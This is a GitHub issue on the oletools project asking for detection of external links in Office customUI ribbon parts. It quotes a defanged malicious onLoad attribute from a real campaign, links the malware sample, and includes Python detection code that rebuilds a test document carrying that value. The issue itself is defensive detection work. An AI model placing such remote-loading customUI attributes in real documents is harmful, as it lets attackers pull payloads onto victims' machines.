decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools

oleobj: add detection for customUI external links #730

Open decalage2 opened 2 years ago

decalage2 commented 2 years ago

See this article: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html Sample: https://bazaar.abuse.ch/sample/f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4/

Example:

<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>
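The check the issue asks for, written here as an added example rather than code from oletools itself: open the OOXML package as a zip, find the ribbon customisation parts (`customUI/customUI.xml` for the 2006 schema and `customUI/customUI14.xml` for the 2010 schema), and flag any attribute whose value points outside the document (a URL scheme such as `https://` or a UNC path). The sample document is constructed in memory and only mirrors the `onLoad` attribute quoted above; the part names, the regular expressions and the function names are this example's own assumptions, not an oletools API.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

# Ribbon customisation parts as used by the 2006 and 2010 customUI schemas
# (assumption of this example; Office looks them up via _rels, we match by name).
CUSTOMUI_PART_RE = re.compile(r'^customUI/customUI(14)?\.xml$', re.IGNORECASE)

# An attribute value that points outside the document: any URI scheme
# (https://, file://, ...) or a UNC path starting with two backslashes.
EXTERNAL_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*://|\\\\)', re.IGNORECASE)


def find_customui_external_links(package: bytes):
    """Return (part_name, element, attribute, value) for every attribute in a
    customUI part whose value looks like an external location.

    Any attribute is inspected, not only onLoad, so callbacks such as
    onAction pointing at a remote file are reported as well."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not CUSTOMUI_PART_RE.match(name):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                # A malformed customUI part is suspicious in itself, but this
                # example only reports what it can parse.
                continue
            for elem in root.iter():
                for attr, value in elem.attrib.items():
                    if EXTERNAL_RE.match(value.strip()):
                        tag = elem.tag.split('}')[-1]  # drop the namespace
                        findings.append((name, tag, attr, value))
    return findings


def build_sample(onload_value: str) -> bytes:
    """Build a minimal OOXML-like zip (constructed test input, not a real
    Office document) carrying a customUI part with the given onLoad value."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('[Content_Types].xml',
                    '<Types xmlns="http://schemas.openxmlformats.org/'
                    'package/2006/content-types"/>')
        zf.writestr('customUI/customUI.xml',
                    '<customUI xmlns="http://schemas.microsoft.com/office/'
                    '2006/01/customui" onLoad=\'%s\'> </customUI>' % onload_value)
    return buf.getvalue()


if __name__ == '__main__':
    if len(sys.argv) > 1:
        with open(sys.argv[1], 'rb') as fh:
            data = fh.read()
    else:
        # Defanged value copied from the issue text above.
        data = build_sample('https://wordkeyvpload[.]net/keys/parliament_rew.xls!123')
    for part, tag, attr, value in find_customui_external_links(data):
        print('%s: <%s %s=%r> points to an external location' % (part, tag, attr, value))
```

Run without arguments to check the constructed sample, or pass a `.docx`/`.xlsx`/`.pptx` path. A legitimate `onLoad` names a VBA callback (for example `onLoad="MyRibbonLoaded"`), so it never matches; values with a URI scheme or a `\\server\share` prefix are what the Trellix write-up describes and are the ones reported.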
christian-intra2net commented 2 years ago

If this sample is publicly available, could we add it to our unit test samples and check that the customUI-threat is also detected in the future?